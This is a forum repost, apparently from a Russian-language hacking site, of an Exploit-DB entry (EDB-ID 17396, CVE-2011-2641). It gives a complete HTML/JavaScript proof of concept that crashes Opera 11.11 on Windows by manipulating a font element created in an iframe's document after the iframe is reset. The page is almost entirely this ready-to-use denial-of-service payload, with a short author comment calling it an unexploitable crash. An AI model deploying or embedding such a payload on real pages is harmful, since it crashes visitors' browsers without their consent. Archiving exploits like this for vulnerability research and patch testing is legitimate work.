Exploit Opera Web Browser 11.11 - Remote Crash

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
17396
Проверка EDB
  1. Пройдено
Автор
ECHO
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2011-2641
Дата публикации
2011-06-14
HTML:
<html>
  <body>
   <iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>
   <script type="text/javascript"  language="javascript">
  
    /*
    *               
    * Opera 11.11 Remote  Crash 
    * Software link: http://www.opera.com/download/
    * Tested on: Win32 xp home sp 3    
    * CVE : null
    *         
    * Im too lazy to deep analyze this ,but i thing is just unexploitable crash 
    * so f****jixvt
    *      ( dla klechis³awa i jego kosiarki :i )
    *    
    */                
  
      var a = window.document.getElementById('bo0om');
      var b = a.contentDocument.createElement('font');
      a.src='about:blank';
      setTimeout('b.face = "h3h";',500);
      
   </script>
  </body>
</html>
 
Источник
www.exploit-db.com

Похожие темы